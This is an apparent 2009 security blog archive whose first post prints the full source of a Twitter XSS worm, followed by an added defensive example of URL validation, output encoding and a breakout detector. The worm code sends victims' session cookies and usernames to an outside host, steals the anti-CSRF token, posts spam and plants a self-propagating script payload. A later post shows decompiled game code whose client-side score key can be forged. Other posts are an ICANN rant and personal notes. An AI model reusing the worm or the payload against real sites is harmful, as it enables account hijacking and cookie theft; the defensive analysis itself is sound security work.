Current Topic: Miscellaneous
Another Ajax powered XSS worm
Topic: Miscellaneous
10:06 pm EDT, Apr 12, 2009
An XSS/Ajax worm hit Twitter. But it's cool, because Ajax doesn't help amplify XSS attacks, right? Oh, wait, maybe it does. ;-)
Update: Source
function XHConn()
{
    var xmlhttp, bComplete = false;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) { try { xmlhttp = new XMLHttpRequest(); }
    catch (e) { xmlhttp = false; }}}
    if (!xmlhttp) return null;
    this.connect = function(sURL, sMethod, sVars, fnDone)
    {
        if (!xmlhttp) return false;
        bComplete = false;
        sMethod = sMethod.toUpperCase();
        try {
            if (sMethod == "GET")
            {
                xmlhttp.open(sMethod, sURL+"?"+sVars, true);
                sVars = "";
            }
            else
            {
                xmlhttp.open(sMethod, sURL, true);
                xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
                xmlhttp.setRequestHeader("Content-Type",
                    "application/x-www-form-urlencoded");
            }
            xmlhttp.onreadystatechange = function(){
                if (xmlhttp.readyState == 4 && !bComplete)
                {
                    bComplete = true;
                    fnDone(xmlhttp);
                }};
            xmlhttp.send(sVars);
        }
        catch(z) { return false; }
        return true;
    };
    return this;
}

function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    ret = encodeURIComponent(ret);
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
}

// Scrape the logged-in screen name out of the page's own meta tag.
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];

// Exfiltrate the session cookie and screen name to a third-party host.
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");

function wait()
{
    // Scrape the anti-CSRF token embedded in the page so the XHR posts are accepted.
    var content = document.documentElement.innerHTML;
    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(content);
    authtoken = authtoken[1];
    //alert(authtoken);
    var randomUpdate=new Array();
    randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
    randomUpdate[1]="Join www.StalkDaily.com everyone!";
    randomUpdate[2]="Woooo, www.StalkDaily.com :)";
    randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
    randomUpdate[4]="Wow...www.StalkDaily.com";
    randomUpdate[5]="@twitter www.StalkDaily.com";
    var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
    updateEncode = urlencode(genRand);
    // Payload that breaks out of the profile URL's href attribute and loads the worm again.
    var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
    // Post a status update and rewrite the profile URL through the site's own Ajax endpoints,
    // using the victim's session: this is the "amplification" the post is talking about.
    var ajaxConn = new XHConn();
    ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
    var ajaxConn1 = new XHConn();
    ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
Another Ajax powered XSS worm
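An added illustration from the defender's side (this is not part of the original post and not the worm source above): the worm's foothold was a profile URL field that the site wrote back into an href attribute without validation or output encoding, so a double quote in the stored value closed the attribute and the tag. The snippet shows that rendering pattern beside a version that validates the URL on input and HTML-encodes it on output, plus a small check that flags the tag breakout in rendered markup. The payload string, hostnames and function names are constructed for the example.

```javascript
// Added example; not the original post's code. Hostnames and the payload are constructed.
const CONSTRUCTED_PAYLOAD =
  'http://example.invalid"></a><script src="http://attacker.invalid/x.js"></script><a ';

// Unsafe: the classic string-concatenation template with no encoding.
function renderProfileLinkUnsafe(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Encode the five characters that matter inside an HTML attribute or text node.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Accept only absolute http(s) URLs; reject anything the WHATWG URL parser
// cannot make sense of and any other scheme (javascript:, data:, ...).
// Returns the normalised URL, or null when the value is rejected.
function validateProfileUrl(input) {
  let parsed;
  try {
    parsed = new URL(String(input));
  } catch (e) {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return parsed.href;
}

// Hardened: validate on input, encode on output. Both layers matter; a
// syntactically valid URL can still carry characters that need encoding.
function renderProfileLinkSafe(url) {
  const clean = validateProfileUrl(url);
  if (clean === null) return '';
  const enc = escapeHtml(clean);
  return '<a href="' + enc + '">' + enc + '</a>';
}

// Detector for the breakout class the worm relied on: any tag other than the
// single <a> wrapper appearing in the rendered fragment.
function containsTagBreakout(html) {
  const inner = html.replace(/^<a href="[^"]*">/, '').replace(/<\/a>$/, '');
  return /<\/?[a-z]/i.test(inner);
}
```

The validator is the first line of defence because a profile URL has a narrow legitimate shape; the encoder is the second because templates get reused for fields that are not URLs. The detector is useful as a regression test on templates rather than as a runtime filter.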
Topic: Miscellaneous
11:32 pm EDT, Apr 8, 2009
The familiar .com, .net, .org and 18 other suffixes — officially "generic top-level domains" — could be joined by a seemingly endless stream of new ones next year under a landmark change approved last summer by the Internet Corp. for Assigned Names and Numbers, the entity that oversees the Web's address system.
Tourists might find information about the Liberty Bell, for example, at a site ending in .philly. A rapper might apply for a Web address ending in .hiphop.
"Whatever is open to the imagination can be applied for," says Paul Levins, ICANN's vice president of corporate affairs. "It could translate into one of the largest marketing and branding opportunities in history."
ICANN needs to be stopped. They are proposing and promoting concepts that will irrevocably damage the Internet, with essentially no one to keep them in check.
Something seriously must be done about the pollution of the TLDs.
From RFC 1591 in 1994:
2. The Top Level Structure of the Domain Names
In the Domain Name System (DNS) naming of computers there is a hierarchy of names. The root of system is unnamed. There are a set of what are called "top-level domain names" (TLDs). These are the generic TLDs (EDU, COM, NET, ORG, GOV, MIL, and INT), and the two letter country codes from ISO-3166. It is extremely unlikely that any other TLDs will be created.
Postel must be screaming in his grave to know ICANN rolled like a dog in heat to special interests and already created bullshit TLDs like:
*.aero *.asia *.biz *.cat *.coop *.info *.jobs *.mil *.mobi *.museum *.name *.pro *.tel *.travel
This is insanity. ICANN's mission statement is not to facilitate "the largest marketing and branding opportunities in history." It's to manage and preserve the operational stability of the Internet's addressing systems! When the hell did it become being a stooge for the world's ISPs?
Fuck. This. Shit.
ICANN == Whores
Topic: Miscellaneous
9:48 am EDT, Apr 6, 2009
Very cool. The drums fit well with this song.
Lux Aeterna Cover
Practical uses of SWFScan
Topic: Miscellaneous
2:46 pm EDT, Apr 1, 2009
Or: How Billy hacked Zombie Hooker Nightmare to get his name on TV during [adult swim].
public static function submit(arg0:String, arg1:Number) : String
{
    strURI = null;
    nGameId = null;
    nScore = NaN;
    nTime = NaN;
    strTime = null;
    strN1 = null;
    strN2 = null;
    n1 = NaN;
    n2 = NaN;
    nAlgo = NaN;
    strToPass = null;
    encrypted_data = null;
    submission_data = null;
    variables = null;
    request = null;
    gameID = arg0;
    score = arg1;
    try {
        strURI = ExternalInterface.call("getLittleServer");
        nGameId = gameID;
        nScore = score;
        nTime = ExternalInterface.call("getSrvrTime");
        // Decompiler output: the receiver of toString()/substr() was not recovered (presumably the time value).
        strTime = toString();
        strN1 = substr(253, 3);
        strN2 = substr(252, 3);
        n1 = parseInt(strN1);
        n2 = parseInt(strN2);
        nAlgo = n1 * n2 * nScore + nScore;
        strToPass = nGameId + "," + nScore + "," + nTime + "," + nAlgo;
        //**********************
        //**********************
        //**********************
        // The "key" is an MD5 over values the client already holds; no server-side secret is involved.
        encrypted_data = MD5.hash(strToPass);
        submission_data = "score=" + nScore + "|gameId=" + nGameId + "|timestamp=" + nTime + "|key=" + encrypted_data;
        //**********************
        //**********************
        //**********************
        variables = new URLVariables();
        variables.attr1 = submission_data;
        request = new URLRequest(strURI);
        request.data = variables;
        navigateToURL(request, "_self");
        return submission_data;
    } catch (e:Error) {
        var loc1:* = e;
        gameID = null;
    }
    return null;
}
Practical uses of SWFScan
Topic: Miscellaneous
1:00 pm EDT, Apr 1, 2009
I love getting the emails that go:
Dear Billy,
blah blah blah, tried every possible option, blah blah blah, new rule, blah blah blah, nothing I can do.
When really they just could have written: "Dear Billy, Fuck You."
...
Topic: Miscellaneous
10:17 pm EDT, Mar 24, 2009
Caleb: What do you think Jeff? Did you like it? Jeff: I like the other 5 we had at the other place.
ahhhh memories.
SPI Labs Dinner